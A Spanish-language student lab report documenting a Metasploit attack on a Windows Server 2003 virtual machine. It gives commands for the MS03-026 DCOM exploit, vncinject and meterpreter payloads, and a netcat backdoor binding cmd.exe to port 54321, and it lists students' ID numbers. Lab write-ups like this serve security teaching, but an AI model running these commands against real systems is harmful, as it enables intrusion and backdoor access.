Practica de Ataque Kali Linux

23
República Bolivariana de Venezuela Ministerio del Poder Popular para la Defensa Universidad Nacional Experimental Politécnica de la Fuerza Armada Bolivariana Ingeniería de Sistemas 6º Semestre. Sección “A” Sistema Operativo Núcleo Chuao PRÁCTICA DE ATAQUE UTILIZANDO BACKTRACK Integrantes: Gianfranco Catapano C.I: 24.222.125 María Carolina Pesquera C.I: 21.344.216 Ricardo Zambrano C.I:19.397.089

description

un manual que te ayudara a entender los ataques con Backtrack & Kali Linux

Transcript of Practica de Ataque Kali Linux

Repblica Bolivariana de VenezuelaMinisterio del Poder Popular para la DefensaUniversidad Nacional Experimental Politcnica de la Fuerza Armada BolivarianaIngeniera de Sistemas6 Semestre. Seccin ASistema OperativoNcleo ChuaoPRCTICA DE ATAQUE UTILIZANDO BACKTRACK

Integrantes:Gianfranco Catapano C.I: 24.222.125Mara Carolina Pesquera C.I: 21.344.216Ricardo Zambrano C.I:19.397.089ngel Echeverra C.I: 21.229.222

Caracas, mayo de 2013Introduccin

Laseguridad informtica, es el rea que se enfoca en la proteccin de la infraestructura computacional y todo lo relacionado con sta (incluyendo la informacin contenida). Para ello existen una serie de estndares, protocolos, mtodos, reglas, herramientas y leyes concebidas para minimizar los posibles riesgos a la infraestructura o a la informacin. La seguridad informtica comprende software, bases de datos, metadatos, archivos y todo lo que la organizacin valore (activo) y signifique un riesgo si sta llega a manos de otras personas. Este tipo de informacin se conoce como informacin privilegiada o confidencial. Hoy en dia existen sistemas operativos destinados a la seguridad informtica como por ejemplo BackTrack, que es unadistribucinGNU/Linuxen formatoLiveCDpensada y diseada para la auditora de seguridad y relacionada con la seguridad informtica en general. Actualmente tiene una gran popularidad y aceptacin en la comunidad que se mueve en torno a laseguridad informtica.Se deriva de la unin de dos grandes distribuciones orientadas a la seguridad, elAuditor+ WHAX. WHAX es la evolucin del Whoppix (WhiteHat Knoppix), el cual pas a basarse en la distribucin LinuxSLAXen lugar deKnoppix. La ltima versin de esta distribucin cambi el sistema base, antes basado enSlaxy ahora enUbuntu. Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerososscanners de puertosy vulnerabilidades, archivos deexploits,sniffers, herramientas de anlisis forense y herramientas para la auditora Wireless.En el siguiente informe y mostrando imgenes de las pantallas nos centramos en facilitar la realizacin de un ataque mediante una maquina virtual con Backtrack para penetrar una pc ( caso especifico: otra mquina virtual con Windows Server 2003) a travs de los denominados exploits los cuales se definen como una secuencia de comandos y/o acciones, utilizada con el fin de aprovechar una vulnerabilidad de seguridad.

Proceso realizado

1- Primero, creamos la mquina virtual de Backtrack; una vez creada e instalada, actualizamos el sistema operativo utilizando los comandos apt-get update y apt-get upgrade.

Posteriormente, creamos la mquina virtual d Windows Server 2003, y confirmamos las direcciones IP de ambas mquinas virtuales:

2- En Backtrack, nos ubicamos en la Terminal, liberamos la direccin IP con los comandos que nos indicaron (sudo dhclient r) y obtenemos una nueva (sudo dhclient).

Luego, llegamos a la consola de Metasploid y nos indica que hay q actualizarla, por tanto, utilizamos el siguiente cdigo: msfupdate y esperamos a que culmine el proceso de actualizacin.

3- En la interfaz de la mquina BackTrack, configuramos la red como Bridge y usamos en la terminal el siguiente comando para colocar la direccin IP :ifconfig eth0 192.168.37.50 netmask 255.255.255.0

4- Usamos el comando show exploits para ver todos los ataques con los que cuenta Metasploit.

Utilizamos el comando Search 03_026, para ubicar exploits especficos

5-Cargamos el exploit usando el comando use, seguido del nombre del exploit. Colocamos el siguiente comando: use exploit/Windows/dcerpc/ms03_026_dcom

6- Utilizamos el comando show options para ver que distintas opciones podan ser configuradas en el exploits antes de lanzar el ataque

7-configuramos el parmetro, utilizando el comando: set RHOST 192.168.37.2, que es la direccin IP del servidor de prueba.

8- Una vez seleccionado el destino del ataque, es necesario configurar el cdigo o la accin que se desea que realice el servidor si el exploit resulta exitoso. Para obtener una lista con los payloads usamos el comando show payloads

9- colocamos uno de los payloads de vncinject con el comando: set payload windows/vncinject/bind_tcp

10- Usamos nuevamente el comando show options.

11- Como los campos tienen los valores correctos, ahora aplicamos exploit y se desplega una ventana VNC con una consola de comandos Windows que nos da acceso system al servidor.

12- Esta vez, ejecutamos el mismo exploit pero con un payload distinto. Configuramos el sistema para que utilice el meterpreter con el comando:set payload windows/meterpreter/bind_tcp

13-Como el ataque ejecutado fue exitoso, el prompt se muestra ahora como meterpreter >

14- Utilizamos help y sale:

15- Una vez probados algunos comandos, configuramos la puerta trasera con el comando :

upload /rofs/pentest/database/oat/tftproot/windows/netcat/nc.exe c:\

Y luego colocamos Shell para tener acceso por lnea de comando al sistema vulnerado.

16-configuramos para abrir el puerto 54321 y dar acceso por lnea de comando de Windows al sistema. Corrimos el comando:

nc.exe l p 54321 e c:\windows\system32\cmd.exe L

17- Una vez ejecutado el paso anterior, probamos desde un terminal en la mquina BackTrack el comando:nc 192.168.37.2 54321

18- Para demostrar que estamos en la mquina, nos metemos en un directorio, en este caso: Archivos de programas:

19- Utilizamos en una nueva terminal el comando netstat an para saber los puertos en los que est trabajando el sistema

Conclusin

La seguridad informtica es un campo infinito, nunca se puede saber y realizar todo lo que uno quiere, Siempre habr alguien ms listo y que sabr ms, cada da, encontraremos nuevas herramientas que vulneran nuevos fallos. Conel avance dela tecnologa, harn a los sistemas msvulnerables. An as, es nuestra tarea como profesionales, el intentar minimizar los riesgos, y tratar de hacer las cosas lo mejor posible. Creemos, que uno de los puntos que hay que ahondar ms, es el concienciar a las personas para la mejora de sus sistemas.Mediante el informe se pudo observar que Backtrack es una poderosa herramienta de hacking y auditoria de sistemas. Est hecho, con toques elegantes que se suman a la sensacin general de la distribucin. Corre muy rpido en el modo directo, incluso ms rpido que la mayora de las distribuciones. Lo ms importante, la matriz de la herramienta de auditora es rica, bien equilibrada y en general bastante impresionantes.Al demostrar uno de sus tantos posibles usos a travs de la prctica realizada con exploits se pudo concluir que Backtrack es un excelente sistema auditor.Para la prctica comenzamos por la creacin y configuracin de dos maquinas virtuales, una con un sistema operativo Backtrack y otra con un sistema operativo Windows 2003, esta ltima sera destinada a recibir el ataque.